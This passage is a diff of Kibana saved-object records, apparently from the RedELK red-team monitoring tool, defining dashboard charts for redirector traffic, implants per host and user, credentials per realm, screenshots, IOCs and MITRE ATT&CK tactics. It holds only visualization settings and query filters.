IP\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"geohash_grid\",\"schema\":\"segment\",\"params\":{\"field\":\"source.geo.location\",\"autoPrecision\":true,\"precision\":2,\"useGeocentroid\":true,\"isFilteredByCollar\":true,\"customLabel\":\"\"}}],\"params\":{\"addTooltip\":true,\"colorSchema\":\"Blues\",\"heatClusterSize\":1.5,\"isDesaturated\":true,\"legendPosition\":\"bottomright\",\"mapCenter\":[0,0],\"mapType\":\"Heatmap\",\"mapZoom\":2,\"wms\":{\"baseLayersAreLoaded\":{},\"enabled\":false,\"options\":{\"format\":\"image/png\",\"transparent\":true},\"selectedTmsLayer\":{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"},\"tmsLayers\":[{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"}]}},\"title\":\"RedELK - Redirector Traffic All\"}"}, "coreMigrationVersion": "7.16.2", "id": "e97f6f10-b982-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152856829, 2297], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"key\":\"c2.log.type\",\"negate\":false,\"params\":{\"query\":\"implant_newimplant\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"implant_newimplant\"}}}]}"}, "title": "RedELK - Implant per top users with computers", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"horizontal_bar\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Amount of implants\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":20,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Username\"}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"host.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":50,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Computername\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false,\"style\":{\"color\":\"#eee\"}},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":200},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-2\",\"name\":\"BottomAxis-1\",\"type\":\"value\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":75,\"filter\":true,\"truncate\":100},\"title\":{\"text\":\"Amount of implants\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Amount of implants\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-2\",\"drawLinesBetweenPoints\":true,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Implant per top users with computers\"}"}, "coreMigrationVersion": "7.16.2", "id": "f0dcbda0-b8e5-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152856829, 2300], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Redirector traffic alarmed IP over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Total hits\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-30h\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"source.ip\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":true,\"otherBucketLabel\":\"Other IPs\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Alarmed IPs\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Total hits\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Total hits\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Redirector traffic alarmed IP over time\"}"}, "coreMigrationVersion": "7.16.2", "id": "f7141500-d4e1-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2302], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - MITRE ATT&CK Tactics tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"signal.rule.threat.tactic.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":300,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":64,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - MITRE ATT&CK Tactics tag cloud\"}"}, "coreMigrationVersion": "7.16.2", "id": "ff3c3b80-d050-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2304], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Credentials per realm tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"creds.realm.keyword\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - Credentials per realm tag cloud\"}"}, "coreMigrationVersion": "7.16.2", "id": "ff4497f0-d319-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "3fabe620-6c38-11ea-97d6-55783aed877a", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2306], "type": "visualization", "version": "1"} \ No newline at end of file +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IOC over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-12M\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"ioc.type\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"IOC Type\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Count\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Count\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - IOC over time\"}"}, "coreMigrationVersion": "7.16.3", "id": "057076f0-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 99], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Screenshots over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Screenshots\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-30d\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Screenshots\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Screenshots\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"top\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Screenshots over time\"}"}, "coreMigrationVersion": "7.16.3", "id": "0b5ffcd0-d317-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 101], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "title": "RedELK - Dashboard links internal", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - Dashboard links internal\",\"type\":\"markdown\",\"aggs\":[],\"params\":{\"fontSize\":12,\"markdown\":\"**Dashboards** : [Summary](/app/dashboards#/view/02486040-d355-11ea-9301-a30a04251ae9) | [Alarms](/app/dashboards#/view/53b69200-d4e3-11ea-9301-a30a04251ae9) | [Traffic](/app/dashboards#/view/0f8626d0-c6f4-11e8-a9c6-cd307b96b1ba) | [Implants](/app/dashboards#/view/117dbba0-c6f5-11e8-a9c6-cd307b96b1ba) | [Red Team Operations](/app/dashboards#/view/04b87c50-d028-11ea-9301-a30a04251ae9) | [Tasks](/app/dashboards#/view/0523c8a0-d025-11ea-9301-a30a04251ae9) | [Downloads](/app/dashboards#/view/643de010-d04c-11ea-9301-a30a04251ae9) | [Credentials](/app/dashboards#/view/82b865a0-d318-11ea-9301-a30a04251ae9) | [Screenshots](/app/dashboards#/view/a2dcebf0-d316-11ea-9301-a30a04251ae9) | [IOC](/app/dashboards#/view/86643e90-d4e4-11ea-9301-a30a04251ae9) | [TTP](/app/dashboards#/view/3ed7a630-d051-11ea-9301-a30a04251ae9) | [Health](/app/dashboards#/view/509e6a80-926a-11eb-a753-9da683898c26)\",\"openLinksInNewTab\":false}}"}, "coreMigrationVersion": "7.16.3", "id": "0f82b540-d237-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [], "sort": [1642171875895, 102], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"key\":\"c2.log.type\",\"negate\":false,\"params\":{\"query\":\"implant_newimplant\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"implant_newimplant\"}}}]}"}, "title": "RedELK - Top computers with new implants", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Amount of implants\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"host.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":17,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Hostname\"}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Username\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Top computers with new implants\"}"}, "coreMigrationVersion": "7.16.3", "id": "10dcc4a0-b8e7-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171875895, 105], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"NOT (redir.backend.name: c2*)\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "title": "RedELK - Redirector Traffic - Decoy", "uiStateJSON": "{\"mapCenter\":[32.93684850365019,0.7170999376103283],\"mapZoom\":2}", "version": 1, "visState": "{\"type\":\"tile_map\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"source.ip\",\"customLabel\":\"Source IP\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"geohash_grid\",\"schema\":\"segment\",\"params\":{\"field\":\"source.geo.location\",\"autoPrecision\":true,\"precision\":2,\"useGeocentroid\":true,\"isFilteredByCollar\":true,\"customLabel\":\"\"}}],\"params\":{\"addTooltip\":true,\"colorSchema\":\"Yellow to Red\",\"heatClusterSize\":1.5,\"isDesaturated\":true,\"legendPosition\":\"bottomright\",\"mapCenter\":[0,0],\"mapType\":\"Heatmap\",\"mapZoom\":2,\"wms\":{\"baseLayersAreLoaded\":{},\"enabled\":false,\"options\":{\"format\":\"image/png\",\"transparent\":true},\"selectedTmsLayer\":{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"},\"tmsLayers\":[{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"}]}},\"title\":\"RedELK - Redirector Traffic - Decoy\"}"}, "coreMigrationVersion": "7.16.3", "id": "10dd40f0-b983-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171875895, 107], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"(redir.backend.name: c2*)\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "title": "RedELK - Redirector Traffic - C2", "uiStateJSON": "{\"mapCenter\":[32.93684850365019,0.7170999376103283],\"mapZoom\":2}", "version": 1, "visState": "{\"type\":\"tile_map\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"source.ip\",\"customLabel\":\"Source IP\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"geohash_grid\",\"schema\":\"segment\",\"params\":{\"field\":\"source.geo.location\",\"autoPrecision\":true,\"precision\":2,\"useGeocentroid\":true,\"isFilteredByCollar\":true,\"customLabel\":\"\"}}],\"params\":{\"addTooltip\":true,\"colorSchema\":\"Yellow to Red\",\"heatClusterSize\":1.5,\"isDesaturated\":true,\"legendPosition\":\"bottomright\",\"mapCenter\":[0,0],\"mapType\":\"Heatmap\",\"mapZoom\":2,\"wms\":{\"baseLayersAreLoaded\":{},\"enabled\":false,\"options\":{\"format\":\"image/png\",\"transparent\":true},\"selectedTmsLayer\":{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"},\"tmsLayers\":[{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"}]}},\"title\":\"RedELK - Redirector Traffic - C2\"}"}, "coreMigrationVersion": "7.16.3", "id": "1d26da60-b983-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171875895, 109], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IP Lists metrics", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - IP Lists metrics\",\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{\"customLabel\":\"IPs\"},\"schema\":\"metric\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"iplist.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":30,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"},\"schema\":\"group\"}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}}}"}, "coreMigrationVersion": "7.16.3", "id": "20fac240-926c-11eb-a753-9da683898c26", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "87530b40-9269-11eb-a753-9da683898c26", "name": "search_0", "type": "search"}], "sort": [1642171875895, 111], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - MITRE ATT&CK Techniques", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-6h\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"signal.rule.threat.technique.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Count\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Count\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - MITRE ATT&CK Techniques\"}"}, "coreMigrationVersion": "7.16.3", "id": "231792d0-d050-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 113], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - MITRE ATT&CK Tactics", "uiStateJSON": "{}", "version": 1, "visState": 